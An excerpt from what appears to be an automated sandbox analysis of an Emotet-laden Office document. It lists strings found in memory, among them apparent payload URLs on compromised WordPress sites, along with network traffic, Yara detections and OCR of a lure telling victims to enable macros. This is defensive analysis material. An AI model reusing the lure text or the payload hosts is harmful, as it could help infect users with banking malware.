                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                Source: powershell.exe, 00000004.00000002.690538281.00000271137E5000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                Source: powershell.exe, 00000004.00000002.698282309.0000027114DD0000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000004.00000002.700973531.000002712B7C0000.00000004.00000001.sdmpString found in binary or memory: https://go.microsoft.co
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://graph.ppe.windows.net
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://graph.ppe.windows.net/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://graph.windows.net
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://graph.windows.net/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                Source: svchost.exe, 0000000F.00000003.742299178.0000027964371000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742084704.00000279643D8000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742108249.0000027964351000.00000004.00000001.sdmpString found in binary or memory: https://instagram.com/hiddencity_
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://layerslider.kreaturamedia.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://lifecycle.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://login.microsoftonline.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://login.windows.local
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://management.azure.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://management.azure.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://messaging.office.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ncus-000.contentsync.
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
                Source: powershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://officeapps.live.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://onedrive.live.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://onedrive.live.com/embed?
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://outlook.office.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://outlook.office365.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/beckenbodentherapie/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/entspannungstherapie/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/hausbesuche/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/lymphdrainage/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/med-trainingstherapie-mtt/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/physiotherapie/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/schwindeltherapie/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/angebot/training-fuer-senioren/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/comments/feed/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/feed/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/kontakt/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/offene-stellen/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/ueber-uns/about-us/
                Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-admin/kK/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/css/layerslider.css?ver=6.8
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.js?ver=1.19.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreaturamedi
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.transitions.
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/buttonizer-multifunctional-button/assets/frontend.css?v=7c
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/buttonizer-multifunctional-button/assets/frontend.min.js?v
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/cmsms-mega-menu//js/jquery.megaMenu.js?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.3
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.3
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=1.
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=1.
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8.3
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.mi
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/adaptive.css?ver=1.0.0
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/animate.css?ver=1.0.0
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/fontello.css?ver=1.0.0
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/ie.css?ver=1.0.0
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/ilightbox-skins/dark-skin.css?ver=2.2.0
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/ilightbox.css?ver=2.2.0
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/retina.css?ver=1.0.0
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/style.css?ver=1.0.0
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/gutenberg/css/frontend-style.css?ver=1.0.0
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/jquer0
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/jquery.iLightBox.min.js?ver=2.2.0
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/jquery.script.js?ver=1.0.0
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/jquery.tweet.min.js?ver=1.3.1
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/jqueryLibraries.min.js?ver=1.0.0
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/jsLibraries.min.js?ver=1.0.0
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/scrollspy.js?ver=1.0.0
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/style.css?ver=1.0.0
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/uploads/2020/01/Logo.png
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/uploads/cmsms_styles/econature.css?ver=1.0.0
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/uploads/cmsms_styles/econature_colors_primary.css?ver=1.0.0
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/uploads/cmsms_styles/econature_colors_secondary.css?ver=1.0.0
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-content/uploads/cmsms_styles/econature_fonts.css?ver=1.0.0
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-includes/js/wp-embed.min.js?ver=5.5.3
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-includes/wlwmanifest.xml
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/wp-json/
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/xmlrpc.php
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://physio-svdh.ch/xmlrpc.php?rsd
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://powerlift.acompli.net
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://settings.outlook.com
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://shell.suite.office.com:1443
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://skyapi.live.net/Activity/
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://staging.cortana.ai
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://store.office.cn/addinstemplate
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://store.office.com/addinstemplate
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://store.office.de/addinstemplate
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://tasks.office.com
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://templatelogging.office.com/client/log
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://use.fontawesome.com/releases/v5.8.2/css/all.css?ver=5.5.3
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://web.microsoftstream.com/video/
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://webshell.suite.office.com
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://wus2-000.contentsync.
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://wus2-000.pagecontentsync.
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: svchost.exe, 0000000F.00000003.740940111.00000279643C9000.00000004.00000001.sdmp | String found in binary or memory: https://www.hulu.com/ca-privacy-rights
Source: svchost.exe, 0000000F.00000003.740940111.00000279643C9000.00000004.00000001.sdmp | String found in binary or memory: https://www.hulu.com/do-not-sell-my-info
Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | String found in binary or memory: https://www.isatechnology.com
Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmp | String found in binary or memory: https://www.isatechnology.com/training/b/
Source: powershell.exe, 00000004.00000002.697183346.0000027114743000.00000004.00000001.sdmp | String found in binary or memory: https://www.isatechnology.comArAC
Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | String found in binary or memory: https://www.odwebp.svc.ms
Source: svchost.exe, 0000000F.00000003.749469958.000002796435B000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmp | String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 0000000F.00000003.749469958.000002796435B000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmp | String found in binary or memory: https://www.roblox.com/info/privacy
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown | HTTPS traffic detected: 194.209.195.106:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 35.208.182.43:443 -> 192.168.2.4:49744 version: TLS 1.2

                E-Banking Fraud:

Yara detected Emotet
Source: Yara match | File source: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.922478242.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.689861945.0000000001070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.689878857.0000000001091000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 8.2.rundll32.exe.f20000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.f40000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.rundll32.exe.1090000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.rundll32.exe.1070000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.rundll32.exe.1070000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.f20000.1.raw.unpack, type: UNPACKEDPE

                System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. End of document W Screen 1
Source: Screenshot number: 4 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 4 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. End of document W Screen 1 of 1 O Type here to
Source: Document image extraction number: 0 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
